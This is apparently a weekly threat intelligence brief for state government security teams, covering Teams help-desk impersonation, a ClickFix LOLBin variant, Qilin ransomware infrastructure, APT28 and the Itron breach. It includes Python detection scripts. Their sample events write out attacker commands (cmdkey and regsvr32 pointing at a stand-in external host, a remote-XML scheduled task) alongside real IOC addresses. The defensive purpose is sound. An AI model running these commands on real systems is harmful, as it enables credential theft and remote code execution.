<p><strong>Threat Assessment Level: ELEVATED</strong> <em>Unchanged from the prior assessment period. Multiple active campaigns targeting government entities, evolving social engineering evasion techniques, a critical infrastructure vendor breach, and fresh nation-state indicators collectively sustain this posture. No single event warranted escalation to HIGH, but the convergence of threats across identity, supply chain, and infrastructure domains demands sustained vigilance.</em></p>
<h2><strong>Executive Summary </strong></h2>
<p>This week, the threat environment for state and local government shifted in ways that matter operationally — not because of a single catastrophic event, but because adversaries are adapting faster than many defensive playbooks. A financially motivated group is now impersonating your IT help desk over Microsoft Teams to deploy persistent malware. The ClickFix social engineering technique — already a top-tier threat to government — has evolved to bypass the PowerShell-based detections most SOCs rely on. A major utility technology vendor disclosed a breach that may ripple through state water and energy infrastructure. And Russia’s APT28 refreshed its malware toolkit with high-confidence indicators that belong in every state detection stack today.</p>
<p>None of these threats exist in isolation. They converge on the same infrastructure your agencies depend on daily: Microsoft 365, Entra ID, Cisco firewalls, and the vendor ecosystem that keeps critical services running. This brief breaks down what changed, what it means, and exactly what to do about it.</p>
<h2><strong>What Changed This Week </strong></h2>
<table>
<thead>
<tr> <th> <p>Date</p> </th> <th> <p>Development</p> </th> <th> <p>Why It Matters for State Government</p> </th> </tr>
</thead>
<tbody>
<tr> <td> <p><strong>24 Apr</strong></p> </td> <td> <p>Google Threat Intelligence Group (GTIG) publishes full analysis of <strong>UNC6692’s SNOW malware framework</strong></p> </td> <td> <p>Documents a complete domain-compromise kill chain initiated through Microsoft Teams impersonation — directly threatens every M365/Teams environment</p> </td> </tr>
<tr> <td> <p><strong>24 Apr</strong></p> </td> <td> <p>CISA adds <strong>4 new entries</strong> to the Known Exploited Vulnerabilities (KEV) catalog</p> </td> <td> <p>Mandatory patching timelines apply to federal systems; state agencies aligned with CISA guidance must prioritize</p> </td> </tr>
<tr> <td> <p><strong>22 Apr</strong></p> </td> <td> <p>CyberProof Threat Research documents a <strong>new ClickFix variant</strong> using cmdkey and regsvr32 instead of PowerShell</p> </td> <td> <p>Renders most existing ClickFix detection rules ineffective — government is an explicit target</p> </td> </tr>
<tr> <td> <p><strong>26–27 Apr</strong></p> </td> <td> <p><strong>WARLOCK SPIDER</strong> (Storm-2603) actor profile refreshed; <strong>Qilin ransomware</strong> FTP exfiltration infrastructure confirmed active</p> </td> <td> <p>U.S. government explicitly listed as a target; active infrastructure IOCs available for blocking</p> </td> </tr>
<tr> <td> <p><strong>26 Apr</strong></p> </td> <td> <p><strong>DragonForce</strong> ransomware actor profile updated; active targeting of government and healthcare confirmed</p> </td> <td> <p>Adds to the ransomware pressure on state and local government alongside WARLOCK SPIDER and Akira</p> </td> </tr>
<tr> <td> <p><strong>27 Apr</strong></p> </td> <td> <p>CrowdStrike delivers <strong>fresh APT28 (Fancy Bear)</strong> malware indicators at confidence level 90</p> </td> <td> <p>Russia’s premier cyber-espionage group has refreshed its tooling — updated indicators are available via Anomali ThreatStream Next-Gen and CrowdStrike feeds</p> </td> </tr>
<tr> <td> <p><strong>13 Apr (disclosed)</strong></p> </td> <td> <p><strong>Itron</strong> discloses unauthorized access to internal IT systems via SEC 8-K filing</p> </td> <td> <p>Itron provides smart meters and grid management to utilities and municipalities nationwide — supply chain exposure for any state using their products</p> </td> </tr>
<tr> <td> <p><strong>27 Apr</strong></p> </td> <td> <p><strong>Vibing.exe</strong> — a Microsoft Store application linked to a Microsoft GenAI research lab in Beijing — found harvesting screenshots, audio, clipboard data</p> </td> <td> <p>Demonstrates that the Microsoft Store itself can be a vector for surveillance-capable software on government endpoints</p> </td> </tr>
<tr> <td> <p><strong>23 Apr (ongoing)</strong></p> </td> <td> <p>Joint 16-agency advisory confirms <strong>Volt Typhoon</strong> and <strong>Flax Typhoon</strong> remain pre-positioned in U.S. critical infrastructure via 200,000+ compromised SOHO routers</p> </td> <td> <p>The “IOC Extinction” concept means traditional blocklist defenses are structurally insufficient against these actors</p> </td> </tr>
<tr> <td> <p><strong>23 Apr (ongoing)</strong></p> </td> <td> <p>CISA Malware Analysis Report on <strong>FIRESTARTER</strong> firmware backdoor targeting Cisco ASA/FTD firewalls</p> </td> <td> <p>Persists at the pre-OS boot level, surviving standard patching — forensic verification required per Emergency Directive 25-03</p> </td> </tr>
<tr> <td> <p><strong>Apr (ongoing)</strong></p> </td> <td> <p><strong>Microsoft Entra ID</strong> Service Principal privilege escalation vulnerability patched in April 2026 Patch Tuesday</p> </td> <td> <p>Unpatched Entra ID environments remain exposed to tenant admin takeover via Service Principal abuse — verify patch deployment immediately</p> </td> </tr>
</tbody>
</table>
<h2><strong>Threat Timeline: Key Events (April 2026)</strong></h2>
<table>
<thead>
<tr> <th> <p>Date</p> </th> <th> <p>Event</p> </th> <th> <p>Actor / Campaign</p> </th> <th> <p>Target Sector</p> </th> </tr>
</thead>
<tbody>
<tr> <td> <p>13 Apr</p> </td> <td> <p>Itron detects unauthorized IT system access</p> </td> <td> <p>Unattributed</p> </td> <td> <p>Energy, Water, Utilities</p> </td> </tr>
<tr> <td> <p>22 Apr</p> </td> <td> <p>ClickFix cmdkey/regsvr32 evasion variant documented</p> </td> <td> <p>Financially motivated (multiple affiliates)</p> </td> <td> <p>Government, Commercial</p> </td> </tr>
<tr> <td> <p>23 Apr</p> </td> <td> <p>CISA publishes FIRESTARTER MAR; updates Emergency Directive 25-03</p> </td> <td> <p>China-nexus (suspected)</p> </td> <td> <p>Network infrastructure</p> </td> </tr>
<tr> <td> <p>23 Apr</p> </td> <td> <p>16-agency advisory on Volt Typhoon / Flax Typhoon SOHO router compromise</p> </td> <td> <p>Volt Typhoon (PLA/MSS), Flax Typhoon (Integrity Technology Group/MSS)</p> </td> <td> <p>U.S. critical infrastructure</p> </td> </tr>
<tr> <td> <p>24 Apr</p> </td> <td> <p>GTIG publishes UNC6692 SNOW framework analysis</p> </td> <td> <p>UNC6692 (financially motivated)</p> </td> <td> <p>Enterprise, Government</p> </td> </tr>
<tr> <td> <p>24 Apr</p> </td> <td> <p>CISA adds 4 new KEV entries</p> </td> <td> <p>Multiple</p> </td> <td> <p>Cross-sector</p> </td> </tr>
<tr> <td> <p>26 Apr</p> </td> <td> <p>DragonForce ransomware actor profile updated; active targeting confirmed</p> </td> <td> <p>DragonForce</p> </td> <td> <p>Government, Healthcare</p> </td> </tr>
<tr> <td> <p>26–27 Apr</p> </td> <td> <p>WARLOCK SPIDER / Qilin ransomware infrastructure refreshed</p> </td> <td> <p>WARLOCK SPIDER (Storm-2603)</p> </td> <td> <p>Government, Healthcare, Energy</p> </td> </tr>
<tr> <td> <p>27 Apr</p> </td> <td> <p>APT28 fresh malware indicators delivered via CrowdStrike</p> </td> <td> <p>APT28 / Fancy Bear (Russia/GRU)</p> </td> <td> <p>Government (targeted)</p> </td> </tr>
<tr> <td> <p>27 Apr</p> </td> <td> <p>Vibing.exe surveillance application identified</p> </td> <td> <p>Linked to Microsoft GenAI research (Beijing)</p> </td> <td> <p>Any Microsoft Store user</p> </td> </tr>
</tbody>
</table>
<h2><strong>Key Threat Analysis </strong></h2>
<h3><strong>1. UNC6692 SNOW Framework: Your Help Desk Is Calling — But It’s Not Your Help Desk</strong></h3>
<p><strong>What it is:</strong> UNC6692 is a financially motivated threat group that has built a sophisticated attack chain around Microsoft Teams social engineering. The playbook: flood a target’s inbox with spam email, then call them on Teams posing as IT support offering to “fix” the problem. Once the victim grants remote access, the attackers deploy an AutoHotKey-based loader that installs the SNOW malware suite — <strong>Snowbelt</strong>, <strong>Snowglaze</strong>, and <strong>Snowbasin</strong> — designed for persistent access, credential harvesting, and ultimately full domain compromise including NTDS.dit exfiltration.</p>
<p><strong>Why it matters for state government:</strong> Every state agency runs Microsoft Teams. The attack exploits trust in internal IT communications and requires no malware delivery via email — it comes through a collaboration platform most security tools treat as trusted. Four independent sources (GTIG, SecurityWeek, HackerNews, SOCPrime) have confirmed the TTPs.</p>
<p><strong>Key ATT&CK techniques:</strong> T1566.003 (Spearphishing via Service), T1204.002 (User Execution: Malicious File), T1219 (Remote Access Software), T1059.010 (AutoHotKey scripting), T1078.004 (Cloud Account abuse), T1114.002 (Remote Email Collection)</p>
<h3><strong>2. ClickFix Evolves: PowerShell Is Out, LOLBins Are In</strong></h3>
<p><strong>What it is:</strong> ClickFix — the social engineering technique that tricks users into executing malicious commands via fake CAPTCHA pages — has been one of the most effective initial access vectors against government targets in 2026. This week, researchers documented a significant evolution: the latest variant <strong>abandons PowerShell entirely</strong>. Instead, it chains two native Windows utilities:</p>
<ul> <li><strong>cmdkey.exe</strong> — stores credentials to an attacker-controlled IP address</li> <li><strong>regsvr32.exe</strong> — loads a remote DLL via UNC path without dropping files to disk</li>
</ul>
<p>The attack then creates a scheduled task (“RunNotepadNow”) that pulls its definition from a remote XML file, enabling persistent and updatable command-and-control.</p>
<p><strong>Why it matters:</strong> Most SOC detection rules for ClickFix key on PowerShell execution patterns. This variant produces zero PowerShell telemetry. If your detection engineering hasn’t been updated for this LOLBin variant, these attacks will sail through undetected. Anomali ThreatStream Next-Gen campaign data explicitly confirms government as a target sector.</p>
<p><strong>Key ATT&CK techniques:</strong> T1204.001 (User Execution: Malicious Link), T1059.003 (Windows Command Shell), T1218.010 (Regsvr32 proxy execution), T1053.005 (Scheduled Task persistence), T1078.001 (Default Accounts — cmdkey credential storage)</p>
<h3><strong>3. WARLOCK SPIDER and the Qilin Ransomware Refresh</strong></h3>
<p><strong>What it is:</strong> WARLOCK SPIDER (also tracked as Storm-2603, GOLD SALEM) is a ransomware-focused threat group operating the <strong>Qilin</strong> ransomware. This week, their actor profile was refreshed with confirmed active infrastructure — specifically FTP-based data exfiltration servers at 176.113.115.209 and 176.113.115.97 (confidence: 100). Their target list explicitly includes U.S. government, government public services, healthcare, energy, education, and manufacturing.</p>
<p>Alongside WARLOCK SPIDER, the <strong>DragonForce</strong>, <strong>Akira</strong>, and <strong>Everest</strong> ransomware groups all showed updated activity profiles targeting government in the same reporting window. The ransomware ecosystem targeting state and local government is not contracting — it is actively refreshing infrastructure and expanding.</p>
<p><strong>Key ATT&CK techniques:</strong> T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery), T1048.003 (Exfiltration Over Unencrypted Protocol — FTP)</p>
<h3><strong>4. APT28 (Fancy Bear): Fresh Russian Malware Indicators</strong></h3>
<p><strong>What it is:</strong> Anomali detected malware indicators attributed to <strong>APT28/Fancy Bear</strong> — Russia’s GRU-linked cyber-espionage group. These are targeted malware samples, not commodity tools. While specific technique details were not included, APT28 historically operates with spearphishing attachments (T1566.001), credential dumping (T1003), and sophisticated C2 over standard web protocols (T1071).</p>
<p><strong>Why it matters:</strong> APT28 has a documented history of targeting government entities. Fresh indicators mean refreshed tooling. The specific hash values from this reporting cycle are available through Anomali ThreatStream Next-Gen — SOC teams should pull the latest APT28 indicators directly from our platform and deploy them to the detection stack immediately.</p>
<h3><strong>5. Itron Breach: A Supply Chain Signal for Water and Energy</strong></h3>
<p><strong>What it is:</strong> Itron — a $2.37 billion company providing smart meters, grid management, and data analytics to utilities and municipalities — disclosed unauthorized access to its internal IT systems via an SEC 8-K filing. The breach was detected on April 13. No ransomware group has claimed responsibility. The company states customer-hosted systems were unaffected, but the investigation is ongoing.</p>
<p><strong>Why it matters:</strong> If your state uses Itron products for water monitoring, smart metering, or energy grid management, this is a supply chain exposure that requires active vendor engagement. The absence of a ransomware claim could indicate espionage rather than financial motivation — which may be worse from a long-term risk perspective.</p>
<h3><strong>6. Continuing Threats: Volt Typhoon, FIRESTARTER, and APT41</strong></h3>
<p>Three major threats from the prior reporting cycle remain active and unresolved:</p>
<ul> <li><strong>Volt Typhoon</strong> and <strong>Flax Typhoon</strong> (China/PLA-MSS) remain pre-positioned in U.S. critical infrastructure via 200,000+ compromised SOHO routers. The joint 16-agency advisory introduced the “IOC Extinction” concept — these actors rotate infrastructure so rapidly that traditional blocklists are structurally ineffective. Behavioral detection is the only reliable countermeasure.</li> <li><strong>FIRESTARTER</strong>, a firmware backdoor targeting Cisco ASA/FTD firewalls, persists at the pre-OS boot level and survives standard patching. CISA’s Emergency Directive 25-03 requires forensic verification of affected devices.</li> <li><strong>APT41</strong> (China/MSS) maintains active targeting of U.S. state government .NET web applications. No new indicators this cycle, but the campaign remains active.</li>
</ul>
<h2><strong>Predictive Analysis: What Comes Next</strong></h2>
<table> <thead> <tr> <th> <p>Scenario</p> </th> <th> <p>Probability</p> </th> <th> <p>Basis</p> </th> <th> <p>Timeframe</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional UNC6692 SNOW reporting with actionable IOCs (hashes, domains) as GTIG analysis propagates</p> </td> <td> <p><strong>HIGH (>70%)</strong></p> </td> <td> <p>GTIG full analysis published; security community amplification cycle underway</p> </td> <td> <p>3–5 days</p> </td> </tr> <tr> <td> <p>Itron breach attribution — ransomware claim on leak site or espionage determination</p> </td> <td> <p><strong>MODERATE (40–60%)</strong></p> </td> <td> <p>SEC 8-K filed; if ransomware, leak site claim typically follows within 1–2 weeks</p> </td> <td> <p>1–2 weeks</p> </td> </tr> <tr> <td> <p>CISA KEV additions for Samsung MagicINFO (CVE-2024-7399) or SharePoint (CVE-2025-53770)</p> </td> <td> <p><strong>MODERATE (40–60%)</strong></p> </td> <td> <p>Active exploitation campaigns detected; KEV addition follows confirmed exploitation</p> </td> <td> <p>1–2 weeks</p> </td> </tr> <tr> <td> <p>ClickFix cmdkey/regsvr32 variant used in confirmed government compromise</p> </td> <td> <p><strong>MODERATE (40–60%)</strong></p> </td> <td> <p>Government explicitly targeted; variant evades common detections</p> </td> <td> <p>2–4 weeks</p> </td> </tr> <tr> <td> <p>Direct ransomware incident against a U.S. state or local government entity</p> </td> <td> <p><strong>LOW-MODERATE (25–40%)</strong></p> </td> <td> <p>WARLOCK SPIDER, DragonForce, Akira all actively targeting government; infrastructure refreshed</p> </td> <td> <p>1–2 weeks</p> </td> </tr> <tr> <td> <p>Volt Typhoon activation (destructive action vs. continued prepositioning)</p> </td> <td> <p><strong>LOW (<20%)</strong></p> </td> <td> <p>Prepositioning posture maintained; activation likely tied to geopolitical trigger</p> </td> <td> <p>Indeterminate</p> </td> </tr> </tbody>
</table>
<h2><strong>SOC Operational Guidance </strong></h2>
<h3><strong>Immediate Detection Priorities</strong></h3>
<p><strong>Hunt Hypothesis 1: ClickFix LOLBin Variant</strong> Adversaries are using cmdkey.exe to store credentials to external IPs and regsvr32.exe to load remote DLLs via UNC paths, bypassing PowerShell-based ClickFix detections.</p>
<ul> <li><strong>Monitor:</strong> Process creation events for cmdkey.exe with command-line arguments containing external IP addresses (T1059.003, T1078.001)</li> <li><strong>Monitor:</strong> regsvr32.exe loading DLLs via UNC paths (\\&lt;IP&gt;\&lt;share&gt;\*.dll) (T1218.010)</li> <li><strong>Monitor:</strong> Scheduled task creation with the name “RunNotepadNow” or tasks pulling XML definitions from remote URLs (T1053.005)</li> <li><strong>Detection logic:</strong> Alert on cmdkey /add commands referencing any non-RFC1918 IP address. Alert on regsvr32 /s /n /i:\\ with external paths.</li>
</ul>
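<p>The detection logic above, worked through as an added example that is not part of this brief or any vendor's ruleset: a small Python scorer over Sysmon-style process-creation events (field names <code>Image</code> and <code>CommandLine</code>) implementing the three rules for the LOLBin variant: cmdkey /add to a non-RFC1918 target, regsvr32 loading from a UNC path, and a scheduled task with the known name or a remotely sourced XML definition. The sample events, the rule names and the address 203.0.113.7 are constructed, not indicators from the brief. One check worth knowing: Python's <code>ipaddress.is_private</code> also returns True for documentation and test ranges such as 203.0.113.0/24, so the internal set is defined explicitly as RFC 1918 plus loopback and link-local.</p>

```python
"""Score process-creation events for the ClickFix cmdkey/regsvr32 variant.

Added example; not code from the brief or any vendor. Sample events are
constructed and 203.0.113.7 is a documentation-range address, not an IOC.
"""
import ipaddress
import re

# Explicit internal ranges (RFC 1918, loopback, link-local). ipaddress.is_private
# would also treat 203.0.113.0/24 and other special ranges as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
IPV4_RE = re.compile(r"(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3})(?![\w.])")
# UNC host is the first component after the leading double backslash.
UNC_HOST_RE = re.compile(r"\\\\([^\\\s\"']+)\\")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
SUSPICIOUS_TASK_NAMES = {"runnotepadnow"}   # task name reported for this variant


def is_external_ip(text):
    """True if text is an IPv4 literal outside the internal ranges."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def external_ips_in(text):
    """All IPv4 literals in a command line that fall outside internal ranges."""
    return [m.group(1) for m in IPV4_RE.finditer(text) if is_external_ip(m.group(1))]


def evaluate(event):
    """Return (rule, severity, detail) findings for one process-creation event."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    findings = []

    # Rule 1: cmdkey /add storing credentials for a non-RFC1918 target.
    if image == "cmdkey.exe" and "/add" in low:
        ext = external_ips_in(cmd)
        if ext:
            findings.append(("clickfix_cmdkey_external_target", "high", ",".join(ext)))

    # Rule 2: regsvr32 loading a DLL from a UNC path (nothing written to disk).
    if image == "regsvr32.exe":
        for host in UNC_HOST_RE.findall(cmd):
            if is_external_ip(host):
                findings.append(("clickfix_regsvr32_unc_external", "high", host))
            else:
                # Hostname or internal IP: still a remote load, route to review.
                findings.append(("regsvr32_unc_load_review", "medium", host))

    # Rule 3: scheduled task with the known name, or a definition fetched remotely.
    if image == "schtasks.exe" and "/create" in low:
        m = re.search(r"/tn\s+\"?([^\s\"]+)", cmd, re.IGNORECASE)
        name = m.group(1).lower() if m else ""
        if name in SUSPICIOUS_TASK_NAMES:
            findings.append(("clickfix_task_known_name", "high", name))
        if "/xml" in low and (URL_RE.search(cmd) or external_ips_in(cmd)):
            findings.append(("clickfix_task_remote_xml", "high", name or "<unnamed>"))
    return findings


# Constructed sample telemetry (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmdkey.exe",
     "CommandLine": r"cmdkey /add:203.0.113.7 /user:guest /pass:x"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /i:\\203.0.113.7\share\x.dll"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /tn RunNotepadNow /xml \\203.0.113.7\share\task.xml /f"},
    # Benign: credential stored for an internal file server, no alert expected.
    {"Image": r"C:\Windows\System32\cmdkey.exe",
     "CommandLine": r"cmdkey /add:10.20.30.40 /user:corp\svc /pass:x"},
]


def scan(events=SAMPLE_EVENTS):
    """Run all rules over a batch; returns (event index, rule, severity, detail)."""
    return [(i, rule, sev, detail)
            for i, ev in enumerate(events) for rule, sev, detail in evaluate(ev)]


if __name__ == "__main__":
    for hit in scan():
        print(hit)
```

<p>Run against the constructed batch, the three attacker-pattern events produce four findings and the internal cmdkey entry produces none. In a SIEM the same three conditions map directly onto process-creation searches; the per-rule names make it easy to tune the medium-severity UNC review path without touching the high-severity rules.</p>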
<p><strong>Hunt Hypothesis 2: UNC6692 Teams-Based Social Engineering</strong> Adversaries are using email bombing followed by Microsoft Teams calls impersonating IT help desk to deploy SNOW malware via AutoHotKey loaders.</p>
<ul> <li><strong>Monitor:</strong> Unusual volume of inbound external Teams calls or messages, especially from unverified domains (T1566.003)</li> <li><strong>Monitor:</strong> AutoHotKey process execution (AutoHotKey.exe, .ahk file creation) on endpoints (T1059.010)</li> <li><strong>Monitor:</strong> Remote access tool sessions initiated during or immediately after Teams calls (T1219)</li> <li><strong>Monitor:</strong> Anomalous M365 email access patterns post-compromise — bulk email reads or forwarding rule creation (T1114.002)</li> <li><strong>Investigate:</strong> Any user-reported “IT called me on Teams” incidents — establish a clear internal communication policy that IT will never cold-call via Teams requesting remote access.</li>
</ul>
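<p>The Teams-call-to-remote-access correlation above, as an added example that is not part of this brief or any vendor's content. It joins inbound external Teams call records with endpoint process events for the same user and alerts when a remote access tool or AutoHotKey runs within a 30-minute window after a call from a non-allowlisted tenant; AutoHotKey execution is also reported on its own. The record layouts are an assumed normalised view such as a SIEM would hold, not Microsoft's audit schema, and the tool list, allowlist and all sample records are constructed.</p>

```python
"""Correlate external Teams calls with follow-on remote access / AutoHotKey activity.

Added example; not code from the brief or any vendor. Record layouts are an
assumption (normalised SIEM view), and all sample records are constructed.
"""
from datetime import datetime, timedelta

# Remote access tools a caller posing as the help desk might ask the user to start.
REMOTE_ACCESS_TOOLS = {"quickassist.exe", "anydesk.exe", "teamviewer.exe",
                       "screenconnect.clientservice.exe", "msra.exe"}
# External Teams tenants with a documented relationship (constructed allowlist).
TRUSTED_EXTERNAL_DOMAINS = {"partner-agency.example"}
WINDOW = timedelta(minutes=30)


def classify_process(ev):
    """Label a process event as 'remote_access_tool', 'autohotkey' or None."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    cmd = ev.get("command_line", "").lower()
    if image in REMOTE_ACCESS_TOOLS:
        return "remote_access_tool"
    if image.startswith("autohotkey") or ".ahk" in cmd:
        return "autohotkey"
    return None


def correlate(teams_events, process_events, window=WINDOW):
    """Alerts for suspicious processes within `window` after an inbound external
    Teams call from a domain that is not on the allowlist."""
    by_user = {}
    for p in process_events:
        kind = classify_process(p)
        if kind:
            by_user.setdefault(p["user"].lower(), []).append(
                (datetime.fromisoformat(p["ts"]), kind, p))
    alerts = []
    for t in teams_events:
        if t["event"] != "ExternalCallReceived":
            continue
        if t["caller_domain"].lower() in TRUSTED_EXTERNAL_DOMAINS:
            continue
        call_time = datetime.fromisoformat(t["ts"])
        for p_time, kind, p in by_user.get(t["user"].lower(), []):
            if call_time <= p_time <= call_time + window:
                alerts.append({
                    "user": t["user"], "caller_domain": t["caller_domain"],
                    "kind": kind, "image": p["image"],
                    "minutes_after_call": int((p_time - call_time).total_seconds() // 60),
                })
    return alerts


def autohotkey_executions(process_events):
    """Stand-alone check: any AutoHotKey execution is worth a look (T1059.010)."""
    return [p for p in process_events if classify_process(p) == "autohotkey"]


# Constructed sample records.
TEAMS_EVENTS = [
    {"ts": "2026-04-27T10:00:00", "user": "alice@state.example",
     "event": "ExternalCallReceived", "caller_domain": "it-helpdesk-support.example"},
    {"ts": "2026-04-27T11:00:00", "user": "bob@state.example",
     "event": "ExternalCallReceived", "caller_domain": "partner-agency.example"},
]
PROCESS_EVENTS = [
    {"ts": "2026-04-27T10:07:00", "user": "alice@state.example",
     "image": r"C:\Windows\System32\quickassist.exe", "command_line": "quickassist.exe"},
    {"ts": "2026-04-27T10:12:00", "user": "alice@state.example",
     "image": r"C:\Users\alice\AppData\Local\Temp\AutoHotkey.exe",
     "command_line": r"AutoHotkey.exe C:\Users\alice\AppData\Local\Temp\run.ahk"},
    # Trusted tenant followed by AnyDesk: no correlated alert.
    {"ts": "2026-04-27T11:05:00", "user": "bob@state.example",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "command_line": "anydesk.exe"},
    # Remote access tool with no preceding call: not correlated.
    {"ts": "2026-04-27T09:00:00", "user": "carol@state.example",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "command_line": "anydesk.exe"},
]


def hunt(teams_events=TEAMS_EVENTS, process_events=PROCESS_EVENTS):
    """Both views a SOC analyst would want: correlated alerts and any AHK execution."""
    return {"correlated": correlate(teams_events, process_events),
            "autohotkey_any": autohotkey_executions(process_events)}


if __name__ == "__main__":
    for alert in hunt()["correlated"]:
        print(alert)
```

<p>On the constructed data only the user who took the unsolicited call and then started Quick Assist and AutoHotKey is flagged; the allowlisted tenant and the uncorrelated AnyDesk launch are not. Tune the allowlist and window to your environment, and treat the remote-access-tool alert as the higher-fidelity signal since the AutoHotKey launch may only be visible if the loader runs under the user's profile.</p>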
<p><strong>Hunt Hypothesis 3: Vibing.exe Surveillance Application</strong> A Microsoft Store application is exfiltrating screenshots, audio, clipboard data, and window titles to an Azure Front Door endpoint.</p>
<ul> <li><strong>Hunt:</strong> Search EDR for vibing.exe or Vibing Installer.exe across all managed endpoints</li> <li><strong>Monitor:</strong> WebSocket connections to Azure Front Door endpoints from non-approved applications (T1041)</li>
</ul>
<p><strong>Hunt Hypothesis 4: Qilin Ransomware Exfiltration</strong> WARLOCK SPIDER is using FTP for pre-encryption data exfiltration to known infrastructure.</p>
<ul> <li><strong>Monitor:</strong> Any outbound FTP (port 21) traffic to external destinations — FTP exfiltration is a hallmark of this group (T1048.003)</li> <li><strong>Investigate:</strong> Outbound FTP connections from servers or workstations that have no business reason for FTP usage</li>
</ul>
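<p>The outbound-FTP hunt above, as an added example that is not part of this brief or any vendor's content. It parses flow records, flags any source that opened a TCP/21 control connection to an external address, and then sums bytes across every flow between that pair so passive-mode data channels on ephemeral ports are counted rather than missed. The two IOC addresses are the Qilin FTP exfiltration servers named earlier in this brief; the flow-record format, the approved-source list and all flow lines are constructed.</p>

```python
"""Flag outbound FTP to external destinations and size the transfer.

Added example; not code from the brief or any vendor. The IOC addresses come
from this brief; the flow format, approved-source list and lines are constructed.
"""
import ipaddress
from collections import defaultdict

QILIN_FTP_IOCS = {"176.113.115.209", "176.113.115.97"}   # from the brief, confidence 100
FTP_APPROVED_SOURCES = {"10.5.0.12"}   # constructed: a host with a documented FTP need
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_external(ip):
    """True when the address is outside RFC 1918 and loopback space."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse_flow(line):
    """Parse 'ts src dst dport proto bytes' (constructed format) into a dict."""
    ts, src, dst, dport, proto, nbytes = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport),
            "proto": proto, "bytes": int(nbytes)}


def find_ftp_exfil(lines):
    """Return one finding per (src, dst) pair that opened FTP control to an external host.

    Bytes are summed over all flows between the pair, not just port 21, because
    passive-mode FTP moves data over ephemeral ports the control rule never sees.
    """
    flows = [parse_flow(ln) for ln in lines
             if ln.strip() and not ln.lstrip().startswith("#")]
    control_pairs = {(f["src"], f["dst"]) for f in flows
                     if f["proto"] == "tcp" and f["dport"] == 21 and is_external(f["dst"])}
    volume = defaultdict(int)
    for f in flows:
        if (f["src"], f["dst"]) in control_pairs:
            volume[(f["src"], f["dst"])] += f["bytes"]
    findings = []
    for (src, dst), total in sorted(volume.items()):
        if dst in QILIN_FTP_IOCS:
            sev, why = "critical", "destination is a known Qilin exfiltration server"
        elif src in FTP_APPROVED_SOURCES:
            sev, why = "info", "approved FTP source; confirm destination is the expected partner"
        else:
            sev, why = "high", "outbound FTP from a host with no documented FTP need"
        findings.append({"src": src, "dst": dst, "severity": sev,
                         "bytes": total, "reason": why})
    return findings


# Constructed flow records; 198.51.100.20 and 203.0.113.44 are documentation-range addresses.
SAMPLE_FLOWS = """
# ts src dst dport proto bytes
2026-04-27T02:14:03Z 10.20.1.55 176.113.115.209 21 tcp 2048
2026-04-27T02:14:05Z 10.20.1.55 176.113.115.209 51234 tcp 734003200
2026-04-27T02:30:00Z 10.5.0.12 198.51.100.20 21 tcp 4096
2026-04-27T03:00:00Z 10.20.1.80 192.168.50.5 21 tcp 1024
2026-04-27T03:10:00Z 10.20.1.91 203.0.113.44 21 tcp 1500
2026-04-27T03:11:00Z 10.20.1.91 203.0.113.44 40000 tcp 52428800
""".strip().splitlines()


def scan(lines=SAMPLE_FLOWS):
    """Convenience wrapper over the constructed sample."""
    return find_ftp_exfil(lines)


if __name__ == "__main__":
    for f in scan():
        print(f["severity"], f["src"], "->", f["dst"], f["bytes"], "bytes:", f["reason"])
```

<p>The internal FTP session (to 192.168.50.5) is ignored, the approved host is reported at info level for periodic review, and the two external pairs are ranked by whether the destination matches the published Qilin infrastructure. The byte total attached to each finding is what turns a port-21 hit into an exfiltration assessment: a 700 MB transfer to an IOC address is a different incident from a 2 KB login attempt.</p>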
<h3><strong>ATT&CK Technique Summary for This Cycle</strong></h3>
<table> <thead> <tr> <th> <p>Technique ID</p> </th> <th> <p>Name</p> </th> <th> <p>Associated Threat</p> </th> </tr> </thead> <tbody> <tr> <td> <p>T1566.003</p> </td> <td> <p>Phishing: Spearphishing via Service</p> </td> <td> <p>UNC6692 SNOW (Teams)</p> </td> </tr> <tr> <td> <p>T1204.001</p> </td> <td> <p>User Execution: Malicious Link</p> </td> <td> <p>ClickFix (fake CAPTCHA)</p> </td> </tr> <tr> <td> <p>T1204.002</p> </td> <td> <p>User Execution: Malicious File</p> </td> <td> <p>UNC6692 SNOW (AutoHotKey)</p> </td> </tr> <tr> <td> <p>T1059.003</p> </td> <td> <p>Command and Scripting: Windows Command Shell</p> </td> <td> <p>ClickFix cmdkey/regsvr32 variant</p> </td> </tr> <tr> <td> <p>T1059.010</p> </td> <td> <p>Command and Scripting: AutoHotKey</p> </td> <td> <p>UNC6692 SNOW</p> </td> </tr> <tr> <td> <p>T1218.010</p> </td> <td> <p>System Binary Proxy Execution: Regsvr32</p> </td> <td> <p>ClickFix LOLBin variant</p> </td> </tr> <tr> <td> <p>T1053.005</p> </td> <td> <p>Scheduled Task/Job</p> </td> <td> <p>ClickFix persistence</p> </td> </tr> <tr> <td> <p>T1078.004</p> </td> <td> <p>Valid Accounts: Cloud Accounts</p> </td> <td> <p>UNC6692, Entra ID flaw</p> </td> </tr> <tr> <td> <p>T1098</p> </td> <td> <p>Account Manipulation</p> </td> <td> <p>Entra ID privilege escalation</p> </td> </tr> <tr> <td> <p>T1114.002</p> </td> <td> <p>Email Collection: Remote Email Collection</p> </td> <td> <p>UNC6692 post-compromise</p> </td> </tr> <tr> <td> 